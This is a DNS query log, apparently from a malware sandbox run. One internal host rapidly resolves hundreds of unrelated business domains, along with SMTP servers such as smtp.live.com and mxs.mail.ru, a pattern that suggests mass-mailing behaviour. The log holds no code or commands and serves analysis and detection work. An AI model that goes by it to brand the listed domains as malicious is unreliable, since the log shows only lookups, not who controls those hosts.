                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.602045059 CEST192.168.2.68.8.8.80x3aaeStandard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.693459034 CEST192.168.2.68.8.8.80x7977Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.922970057 CEST192.168.2.68.8.8.80x5b0cStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.944456100 CEST192.168.2.68.8.8.80x9222Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.962317944 CEST192.168.2.68.8.8.80x8dd3Standard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.007625103 CEST192.168.2.68.8.8.80x6d64Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.171336889 CEST192.168.2.68.8.8.80x68e7Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.175674915 CEST192.168.2.68.8.8.80xceccStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.342992067 CEST192.168.2.68.8.8.80x6293Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.381654024 CEST192.168.2.68.8.8.80xac91Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.397912979 CEST192.168.2.68.8.8.80x494Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.569375038 CEST192.168.2.68.8.8.80xd84cStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.628667116 CEST192.168.2.68.8.8.80x7324Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.629667997 CEST192.168.2.68.8.8.80x4ebfStandard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.629755974 CEST192.168.2.68.8.8.80xdec3Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.897181988 CEST192.168.2.68.8.8.80x5b0cStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.969238997 CEST192.168.2.68.8.8.80x81c9Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.980465889 CEST192.168.2.68.8.8.80xbae5Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.994729996 CEST192.168.2.68.8.8.80x8fa9Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.005934954 CEST192.168.2.68.8.8.80x8eceStandard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.139801025 CEST192.168.2.68.8.8.80xa966Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.152746916 CEST192.168.2.68.8.8.80x3a36Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.578828096 CEST192.168.2.68.8.8.80xab80Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.579037905 CEST192.168.2.68.8.8.80x5b51Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.643590927 CEST192.168.2.68.8.8.80xb3bfStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.644057035 CEST192.168.2.68.8.8.80x62e2Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.644556046 CEST192.168.2.68.8.8.80x7324Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.656074047 CEST192.168.2.68.8.8.80x5a31Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.659946918 CEST192.168.2.68.8.8.80xa7eeStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.223268032 CEST192.168.2.68.8.8.80xbd3eStandard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.225156069 CEST192.168.2.68.8.8.80x6d3eStandard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.225514889 CEST192.168.2.68.8.8.80x6fa7Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.297178030 CEST192.168.2.68.8.8.80xbeStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.316204071 CEST192.168.2.68.8.8.80x8fe8Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.336112976 CEST192.168.2.68.8.8.80x2f21Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.466092110 CEST192.168.2.68.8.8.80x8750Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.471364021 CEST192.168.2.68.8.8.80x41f0Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.486092091 CEST192.168.2.68.8.8.80xd82bStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.667088985 CEST192.168.2.68.8.8.80xe6dbStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.671606064 CEST192.168.2.68.8.8.80x77eStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.690275908 CEST192.168.2.68.8.8.80xf226Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.703636885 CEST192.168.2.68.8.8.80x7324Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:39.887572050 CEST192.168.2.68.8.8.80xcfc5Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.084244013 CEST192.168.2.68.8.8.80x1dddStandard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.134043932 CEST192.168.2.68.8.8.80xb059Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.134710073 CEST192.168.2.68.8.8.80xc06eStandard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.143476009 CEST192.168.2.68.8.8.80x2f37Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.163963079 CEST192.168.2.68.8.8.80x38adStandard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.168016911 CEST192.168.2.68.8.8.80xcd56Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.183058977 CEST192.168.2.68.8.8.80xcbf0Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.616970062 CEST192.168.2.68.8.8.80x810fStandard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.680310011 CEST192.168.2.68.8.8.80x6fccStandard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.695946932 CEST192.168.2.68.8.8.80x2921Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.712949991 CEST192.168.2.68.8.8.80xcfa5Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.877254963 CEST192.168.2.68.8.8.80x10a1Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.200793028 CEST192.168.2.68.8.8.80xcbf0Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.243936062 CEST192.168.2.68.8.8.80x81d2Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.308337927 CEST192.168.2.68.8.8.80x1e1fStandard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.483069897 CEST192.168.2.68.8.8.80x9e70Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.630516052 CEST192.168.2.68.8.8.80xafc6Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.645127058 CEST192.168.2.68.8.8.80x6fccStandard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.677051067 CEST192.168.2.68.8.8.80x22afStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.739190102 CEST192.168.2.68.8.8.80x2e24Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.839101076 CEST192.168.2.68.8.8.80xa367Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.868788004 CEST192.168.2.68.8.8.80x8b52Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.366465092 CEST192.168.2.68.8.8.80xb3ffStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.473213911 CEST192.168.2.68.8.8.80x9e70Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.580426931 CEST192.168.2.68.8.8.80xa996Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.879626989 CEST192.168.2.68.8.8.80xa367Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.068111897 CEST192.168.2.68.8.8.80x4992Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.182857990 CEST192.168.2.68.8.8.80xd533Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.499341965 CEST192.168.2.68.8.8.80x1492Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.506711960 CEST192.168.2.68.8.8.80x3c49Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.531451941 CEST192.168.2.68.8.8.80x1d5cStandard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.712218046 CEST192.168.2.68.8.8.80xf685Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.975625992 CEST192.168.2.68.8.8.80x8bcdStandard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.445182085 CEST192.168.2.68.8.8.80x24e8Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.554620981 CEST192.168.2.68.8.8.80x3c49Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.689516068 CEST192.168.2.68.8.8.80xe620Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.738823891 CEST192.168.2.68.8.8.80xf685Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.936017990 CEST192.168.2.68.8.8.80x5eb7Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.155080080 CEST192.168.2.68.8.8.80x1983Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.257812977 CEST192.168.2.68.8.8.80xf521Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.293692112 CEST192.168.2.68.8.8.80x1ae7Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.605639935 CEST192.168.2.68.8.8.80xfae1Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.146173000 CEST192.168.2.68.8.8.80x1983Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.205100060 CEST192.168.2.68.8.8.80x7ef5Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.352382898 CEST192.168.2.68.8.8.80x31e4Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.353136063 CEST192.168.2.68.8.8.80x45d5Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.353945017 CEST192.168.2.68.8.8.80xd0e4Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.803314924 CEST192.168.2.68.8.8.80x2a13Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.372791052 CEST192.168.2.68.8.8.80x45d5Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.445772886 CEST192.168.2.68.8.8.80xe65bStandard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.446943998 CEST192.168.2.68.8.8.80x250fStandard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.499387980 CEST192.168.2.68.8.8.80xd1ddStandard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.545809031 CEST192.168.2.68.8.8.80xacdbStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.702399969 CEST192.168.2.68.8.8.80xc765Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:47.798691034 CEST192.168.2.68.8.8.80x7e99Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.168978930 CEST192.168.2.68.8.8.80x52d5Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.354386091 CEST192.168.2.68.8.8.80xd131Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.421386003 CEST192.168.2.68.8.8.80x45d5Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.472829103 CEST192.168.2.68.8.8.80xfcbdStandard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.783433914 CEST192.168.2.68.8.8.80x9d9dStandard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:48.836637020 CEST192.168.2.68.8.8.80xdae0Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.226058006 CEST192.168.2.68.8.8.80x15Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.282674074 CEST192.168.2.68.8.8.80x20ccStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.413788080 CEST192.168.2.68.8.8.80xd131Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.579387903 CEST192.168.2.68.8.8.80x9115Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.611958027 CEST192.168.2.68.8.8.80x6250Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:49.918845892 CEST192.168.2.68.8.8.80xbfa4Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.055690050 CEST192.168.2.68.8.8.80xecc1Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.908602953 CEST192.168.2.68.8.8.80xb632Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:50.995623112 CEST192.168.2.68.8.8.80xaf3cStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:51.972743988 CEST192.168.2.68.8.8.80xb054Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:52.974262953 CEST192.168.2.68.8.8.80xb054Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.096016884 CEST192.168.2.68.8.8.80xaad8Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.525316954 CEST192.168.2.68.8.8.80xefd0Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.745026112 CEST192.168.2.68.8.8.80xa025Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:53.950639009 CEST192.168.2.68.8.8.80x2a7bStandard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:54.230412960 CEST192.168.2.68.8.8.80x1636Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:54.681416035 CEST192.168.2.68.8.8.80xf9bdStandard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.076467037 CEST192.168.2.68.8.8.80x3d79Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.563915014 CEST192.168.2.68.8.8.80x7eabStandard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.731456041 CEST192.168.2.68.8.8.80xa28eStandard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.775580883 CEST192.168.2.68.8.8.80x91bStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:55.977164984 CEST192.168.2.68.8.8.80xa2bStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:56.085756063 CEST192.168.2.68.8.8.80x3d79Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:56.804933071 CEST192.168.2.68.8.8.80x48adStandard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:57.214993000 CEST192.168.2.68.8.8.80x8eecStandard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.497916937 CEST192.168.2.68.8.8.80xab94Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.504040003 CEST192.168.2.68.8.8.80xab51Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.702573061 CEST192.168.2.68.8.8.80xf721Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.760495901 CEST192.168.2.68.8.8.80xad88Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.786657095 CEST192.168.2.68.8.8.80x54d3Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:58.870403051 CEST192.168.2.68.8.8.80x3a03Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:59.108735085 CEST192.168.2.68.8.8.80x5124Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:59.486696005 CEST192.168.2.68.8.8.80xef3dStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:59.740911961 CEST192.168.2.68.8.8.80x54d3Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:59.859877110 CEST192.168.2.68.8.8.80x219fStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.336714029 CEST192.168.2.68.8.8.80x6724Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.388474941 CEST192.168.2.68.8.8.80xad86Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.634483099 CEST192.168.2.68.8.8.80x198bStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.718952894 CEST192.168.2.68.8.8.80xb782Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:00.740248919 CEST192.168.2.68.8.8.80x54d3Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:01.129473925 CEST192.168.2.68.8.8.80xc22bStandard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:01.144089937 CEST192.168.2.68.8.8.80xab69Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:01.269532919 CEST192.168.2.68.8.8.80x6241Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:01.613708973 CEST192.168.2.68.8.8.80x926fStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:01.655720949 CEST192.168.2.68.8.8.80xe96bStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:02.187361002 CEST192.168.2.68.8.8.80x72baStandard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:02.788477898 CEST192.168.2.68.8.8.80x54d3Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.294609070 CEST192.168.2.68.8.8.80x34dbStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.294843912 CEST192.168.2.68.8.8.80xe264Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.295084000 CEST192.168.2.68.8.8.80x3aa7Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.295171976 CEST192.168.2.68.8.8.80x41fcStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.300435066 CEST192.168.2.68.8.8.80xcc64Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.362879038 CEST192.168.2.68.8.8.80x65a0Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.363504887 CEST192.168.2.68.8.8.80xa15cStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.611608982 CEST192.168.2.68.8.8.80x5c4eStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.611843109 CEST192.168.2.68.8.8.80x69caStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.613634109 CEST192.168.2.68.8.8.80x1522Standard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.615605116 CEST192.168.2.68.8.8.80x837dStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.617619038 CEST192.168.2.68.8.8.80x4c65Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.619785070 CEST192.168.2.68.8.8.80xdaeeStandard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.622647047 CEST192.168.2.68.8.8.80x72cbStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.628266096 CEST192.168.2.68.8.8.80x7a3dStandard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.630640984 CEST192.168.2.68.8.8.80x68a7Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.633594036 CEST192.168.2.68.8.8.80x3404Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.639404058 CEST192.168.2.68.8.8.80xbbf0Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.642575979 CEST192.168.2.68.8.8.80x88ccStandard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
